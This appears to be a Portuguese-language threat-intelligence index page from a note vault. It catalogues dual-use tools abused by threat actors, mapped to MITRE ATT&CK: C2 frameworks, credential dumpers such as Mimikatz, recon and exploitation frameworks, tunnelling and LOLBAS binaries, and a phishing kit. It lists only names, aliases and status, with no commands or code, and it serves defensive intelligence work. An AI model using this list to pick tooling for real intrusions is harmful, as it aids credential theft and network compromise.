# Tools - Dual-Use Software > Ferramentas legitimas frequentemente abusadas por threat actors em campanhas reais. Organizadas em quatro categorias funcionais alinhadas ao MITRE ATT&CK: frameworks C2, ferramentas de credenciais, reconhecimento e frameworks de exploração. As demais ferramentas de suporte operacional (tunelamento, evasão, LOLBAS) ficam nesta raiz. ```mermaid graph TB TOOLS["🔧 Tools Hub<br/>Dual-Use Software"] subgraph C2["📡 C2 Frameworks"] C2A["Cobalt Strike<br/>Sliver, Mythic"] C2B["Empire, PoshC2<br/>Covenant, Pupy"] end subgraph CRED["🔑 Credential Tools"] CR1["Mimikatz<br/>Rubeus, LaZagne"] CR2["gsecdump, pwdump<br/>fgdump, cachedump"] end subgraph RECON["🔍 Recon Tools"] RE1["BloodHound<br/>AdFind, dsquery"] RE2["AADInternals<br/>ROADTools, Pacu"] end subgraph EXP["💥 Exploitation"] EX1["Impacket<br/>Metasploit, Responder"] EX2["PowerSploit<br/>CrackMapExec, sqlmap"] end subgraph OPS["🛠️ Operacional"] OP1["Tunelamento<br/>ngrok, FRP, HTRAN, Tor"] OP2["LOLBAS<br/>certutil, bitsadmin, cmd"] OP3["Remote Access<br/>PsExec, ConnectWise"] end TOOLS --> C2 TOOLS --> CRED TOOLS --> RECON TOOLS --> EXP TOOLS --> OPS style TOOLS fill:#1abc9c,color:#fff style C2 fill:#1a1a2e,color:#fff style CRED fill:#1a1a2e,color:#fff style RECON fill:#1a1a2e,color:#fff style EXP fill:#1a1a2e,color:#fff style OPS fill:#1a1a2e,color:#fff style C2A fill:#3498db,color:#fff style C2B fill:#2980b9,color:#fff style CR1 fill:#e74c3c,color:#fff style CR2 fill:#c0392b,color:#fff style RE1 fill:#9b59b6,color:#fff style RE2 fill:#8e44ad,color:#fff style EX1 fill:#e67e22,color:#fff style EX2 fill:#d35400,color:#fff style OP1 fill:#27ae60,color:#fff style OP2 fill:#1e8449,color:#fff style OP3 fill:#145a32,color:#fff ``` > [!warning] Dual-Use > Estas ferramentas sao software legitimo com usos defensivos válidos. Sua inclusao aqui documenta o **abuso por threat actors**, nao uma classificação como malware. A separacao segue o MITRE ATT&CK: campo `malware-type: tool` ou `malware-type: toolkit`. ## Subcategorias | Subcategoria | Descrição | Exemplos | | ------------ | --------- | -------- | | [[_c2-frameworks\|C2 Frameworks]] | Frameworks de Command & Control | Cobalt Strike, Sliver, Mythic, Empire | | [[_credential-tools\|Credential Tools]] | Acesso e roubo de credenciais | Mimikatz, Rubeus, LaZagne, gsecdump | | [[_recon-tools\|Recon Tools]] | Reconhecimento e enumeracao | BloodHound, AdFind, AADInternals | | [[_exploitation\|Exploitation]] | Frameworks de exploração | Impacket, Metasploit, Responder, sqlmap | ## Ferramentas Operacionais (raiz) Ferramentas de suporte operacional que nao se enquadram em uma única categoria - tunelamento, evasão de defesas, LOLBAS e acesso remoto legítimo. %% ```dataview TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Tipo", aliases AS "Aliases", status AS "Status" FROM "cti/software/tools" WHERE (type = "malware" OR type = "tool") AND file.folder = "cti/software/tools" SORT title ASC ``` %% <!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Tipo", aliases AS "Aliases", status AS "Status" FROM "cti/software/tools" WHERE (type = "malware" OR type = "tool") AND file.folder = "cti/software/tools" SORT title ASC --> <!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Tipo", aliases AS "Aliases", status AS "Status" FROM "cti/software/tools" WHERE (type = "malware" OR type = "tool") AND file.folder = "cti/software/tools" SORT title ASC --> | Nome | Tipo | Aliases | Status | | ------------------------------------------------------------------ | ------------ | ------------------------------------------------------------------------------------------- | ------ | | [[s0110-at\|at]] | tool | <ul><li>at</li><li>at.exe</li></ul> | active | | [[s1176-attrib\|attrib]] | tool | <ul><li>attrib</li><li>attrib.exe</li></ul> | active | | [[s0190-bitsadmin\|BITSAdmin]] | tool | <ul><li>BITSAdmin</li></ul> | active | | [[s1063-brute-ratel-c4\|Brute Ratel C4]] | tool | <ul><li>Brute Ratel C4</li><li>Brute Ratel</li><li>BRc4</li><li>Dark Vortex</li></ul> | active | | [[s0160-certutil\|certutil]] | tool | <ul><li>certutil</li><li>certutil.exe</li></ul> | active | | [[s1205-cipherexe\|cipher.exe]] | tool | <ul><li>cipher.exe</li></ul> | active | | [[s0106-cmd\|cmd]] | tool | <ul><li>cmd</li><li>cmd.exe</li></ul> | active | | [[cobalt-strike\|Cobalt Strike]] | \- | <ul><li>Cobalt Strike</li></ul> | \- | | [[s0591-connectwise\|ConnectWise]] | tool | <ul><li>ConnectWise</li><li>ScreenConnect</li></ul> | active | | [[s0527-cspy-downloader\|CSPY Downloader]] | tool | <ul><li>CSPY Downloader</li></ul> | active | | [[empire\|Empire]] | \- | <ul><li>Empire</li></ul> | \- | | [[s0404-esentutl\|esentutl]] | tool | <ul><li>esentutl</li><li>esentutl.exe</li></ul> | active | | [[s0361-expand\|Expand]] | tool | <ul><li>Expand</li></ul> | active | | [[s0193-forfiles\|Forfiles]] | tool | <ul><li>Forfiles</li></ul> | active | | [[cti/software/tools/s1144-frp.md\|FRP]] | tool | <ul><li>FRP</li></ul> | active | | [[s0095-ftp\|ftp]] | tool | <ul><li>ftp</li><li>ftp.exe</li></ul> | active | | [[s0040-htran\|HTRAN]] | tool | <ul><li>HTRAN</li><li>HUC Packet Transmit Tool</li></ul> | active | | [[cti/software/tools/s0434-imminent-monitor.md\|Imminent Monitor]] | tool | <ul><li>Imminent Monitor</li><li>IM-RAT</li></ul> | active | | [[s0581-ironnetinjector\|IronNetInjector]] | tool | <ul><li>IronNetInjector</li><li>IronNetInjector toolchain</li></ul> | active | | [[cti/software/tools/langflow.md\|Langflow]] | \- | <ul><li>Langflow</li><li>LangFlow</li></ul> | active | | [[s0500-mcmd\|MCMD]] | tool | <ul><li>MCMD</li></ul> | active | | [[s0175-meek\|meek]] | tool | <ul><li>meek</li><li>meek-client</li><li>meek-server</li></ul> | active | | [[s0108-netsh\|netsh]] | tool | <ul><li>netsh</li><li>netsh.exe</li></ul> | active | | [[s0508-ngrok\|ngrok]] | tool | <ul><li>ngrok</li></ul> | active | | [[s0594-out1\|Out1]] | tool | <ul><li>Out1</li></ul> | active | | [[cti/software/tools/psexec.md\|PsExec]] | tool | <ul><li>PsExec</li><li>psexec.exe</li><li>Sysinternals PsExec</li></ul> | active | | [[s1209-quick-assist\|Quick Assist]] | tool | <ul><li>Quick Assist</li></ul> | active | | [[s0364-rawdisk\|RawDisk]] | tool | <ul><li>RawDisk</li></ul> | active | | [[s1040-rclone\|Rclone]] | tool | <ul><li>Rclone</li></ul> | active | | [[s0075-reg\|Reg]] | tool | <ul><li>Reg</li><li>reg.exe</li></ul> | active | | [[s0592-remoteutilities\|RemoteUtilities]] | tool | <ul><li>RemoteUtilities</li></ul> | active | | [[s0053-cobalt-strike\|S0053 Cobalt Strike]] | \- | <ul><li>S0053 Cobalt Strike</li></ul> | \- | | [[s0111-schtasks\|schtasks]] | tool | <ul><li>schtasks</li><li>schtasks.exe</li><li>Windows Task Scheduler</li></ul> | active | | [[s0195-sdelete\|SDelete]] | tool | <ul><li>SDelete</li><li>sdelete.exe</li><li>sdelete64.exe</li></ul> | active | | [[sliver\|Sliver]] | \- | <ul><li>Sliver</li></ul> | \- | | [[s0183-tor\|Tor]] | tool | <ul><li>Tor</li><li>The Onion Router</li><li>Tor Browser</li></ul> | active | | [[tycoon-2fa\|Tycoon 2FA]] | phishing-kit | <ul><li>Tycoon 2FA</li><li>Tycoon2FA</li><li>Tycoon-2FA</li></ul> | active | | [[s0645-wevtutil\|Wevtutil]] | tool | <ul><li>Wevtutil</li><li>wevtutil.exe</li><li>Windows Events Command Line Utility</li></ul> | active | | [[s0191-winexe\|Winexe]] | tool | <ul><li>Winexe</li><li>winexe</li></ul> | active | | [[s0123-xcmd\|xCmd]] | tool | <ul><li>xCmd</li><li>xcmd</li></ul> | active | <!-- SerializedQuery END --> ## Navegacao - [[_software|Software Hub]] - visao geral de malware + tools - [[_cti|CTI Hub]] - hub central de inteligência